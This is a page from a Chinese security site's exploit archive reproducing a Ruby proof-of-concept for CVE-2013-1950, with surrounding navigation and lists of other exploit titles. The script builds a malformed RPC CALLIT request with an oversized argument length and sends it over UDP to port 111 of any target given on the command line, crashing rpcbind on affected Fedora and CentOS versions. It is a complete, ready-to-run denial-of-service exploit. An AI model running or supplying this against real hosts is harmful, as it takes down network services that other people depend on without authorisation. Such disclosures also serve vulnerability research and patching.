首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
rpcbind (CALLIT Procedure) UDP Crash PoC
来源:veritysr1980 [at] gmail.com 作者:Verity 发布时间:2013-07-17  
#!/usr/bin/ruby
#
#   rpcbind_udp_crash_poc.rb
#   07/15/2013
#   Sean Verity <veritysr1980 [at] gmail.com>
#   CVE 2013-1950
#
#   rpcbind (CALLIT Procedure) UDP Crash PoC
#   Affected Software Package: rpcbind-0.2.0-19
#
#   Tested on: 
#   Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) 
#   CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#   rpcbind can be crashed by setting the argument length 
#   value > 8944 in an RPC CALLIT procedure request over UDP.
#
  
require 'socket'
  
def usage
    abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end
  
if ARGV.length == 1
    pkt = [rand(2**32)].pack('N')   # XID
    pkt << [0].pack('N')          # Message Type: CALL (0)
    pkt << [2].pack('N')          # RPC Version: 2
    pkt << [100000].pack('N')     # Program: Portmap (100000)
    pkt << [2].pack('N')          # Program Version: 2
    pkt << [5].pack('N')          # Procedure: CALLIT (5)
    pkt << [0].pack('N')          # Credentials Flavor: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Credentials Verifier: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Program: Unknown (0) 
    pkt << [1].pack('N')          # Version: 1
    pkt << [1].pack('N')          # Procedure: 1
    pkt << [8945].pack('N')           # Argument Length
    pkt << "crash"                    # Arguments
  
    s = UDPSocket.new
    s.send(pkt, 0, ARGV[0], 111)
else
    usage
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Squid-3.3.5 DoS PoC
·Light Audio Mixer Version 1.0.
·MediaCoder 0.8.23.5530 SEH Buf
·Kate's Video Toolkit Version 7
·MediaCoder .M3U Buffer Overflo
·Eglibc PTR MANGLE Bug
·Microsoft Windows Authenticate
·BlazeDVD Pro player 6.1 - Stac
·Corel PDF Fusion Stack Buffer
·Microsoft Office PowerPoint 20
·Tri-PLC Nano-10 r81 - Denial o
·Ultra Mini HTTPD 1.21 - Stack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved